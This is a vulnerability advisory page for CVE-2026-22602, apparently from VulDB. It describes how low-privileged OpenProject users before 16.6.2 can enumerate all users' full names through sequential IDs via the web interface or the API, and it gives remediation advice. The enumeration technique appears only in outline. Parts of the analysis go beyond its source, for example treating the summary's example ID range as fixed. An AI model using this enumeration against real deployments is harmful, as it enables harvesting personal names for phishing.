CVE-2026-22602 in openproject
Summary
by MITRE • 01/10/2026
OpenProject is an open-source, web-based project management software. Prior to version 16.6.2, a low‑privileged logged-in user can view the full names of other users. Since user IDs are assigned sequentially and predictably (e.g., 1 to 1000), an attacker can extract a complete list of all users’ full names by iterating through these URLs. The same behavior can also be reproduced via the OpenProject API, allowing automated retrieval of full names through the API as well. This issue has been patched in version 16.6.2. Those who are unable to upgrade may apply the patch manually.
Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.
Analysis
by VulDB Data Team • 01/11/2026
The vulnerability identified as CVE-2026-22602 affects OpenProject, a widely-used open-source web-based project management platform that serves organizations requiring collaborative project planning and execution capabilities. This security flaw represents a significant information disclosure issue that undermines the confidentiality of user data within the system. The vulnerability specifically impacts versions prior to 16.6.2, where a low-privileged authenticated user can exploit predictable user ID patterns to access sensitive information about other users in the system. The issue stems from the predictable sequential assignment of user identifiers, creating a systematic enumeration path that allows unauthorized information retrieval.
The technical implementation of this vulnerability leverages the predictable nature of user identification within the OpenProject application. User IDs are assigned in a sequential manner from 1 to 1000, creating a deterministic pattern that attackers can exploit through simple URL iteration techniques. This predictable user ID assignment directly violates security principles related to access control and information hiding, as it provides attackers with a systematic method to discover user identities without requiring elevated privileges. The vulnerability manifests through both the web interface and the application programming interface, demonstrating the comprehensive nature of the exposure. The API-based exploitation capability makes this vulnerability particularly dangerous as it enables automated harvesting of user information through programmable scripts and tools.
The operational impact of this vulnerability extends beyond simple information disclosure, creating potential risks for organizational security and privacy. When attackers can systematically enumerate user names, they gain valuable intelligence for social engineering attacks, credential stuffing attempts, and targeted phishing campaigns. The vulnerability effectively removes the confidentiality protections that should exist between users within the same project management environment, potentially exposing sensitive organizational structures and personnel information. Organizations using affected versions of OpenProject face increased risk of targeted attacks, insider threat exploitation, and compliance violations related to data protection regulations. The vulnerability also demonstrates poor access control implementation, as it allows users to access information beyond their intended scope of authorization.
Security practitioners should note this vulnerability aligns with CWE-200 (Information Exposure) and represents a classic case of predictable identifier generation that violates fundamental security principles. The issue also relates to ATT&CK technique T1087.001 (Account Discovery: Local Account) and T1566 (Phishing) as it provides attackers with information that can be used for further exploitation. Organizations should prioritize immediate remediation through the official 16.6.2 patch release, which addresses the root cause by implementing proper access controls and breaking the predictable user ID assignment pattern. For environments unable to upgrade immediately, manual patch application should be considered, though this approach carries inherent risks and should only be implemented by experienced security professionals familiar with the application's codebase. The vulnerability highlights the importance of proper access control mechanisms and the need for robust user identification systems that do not expose predictable patterns to unauthorized users.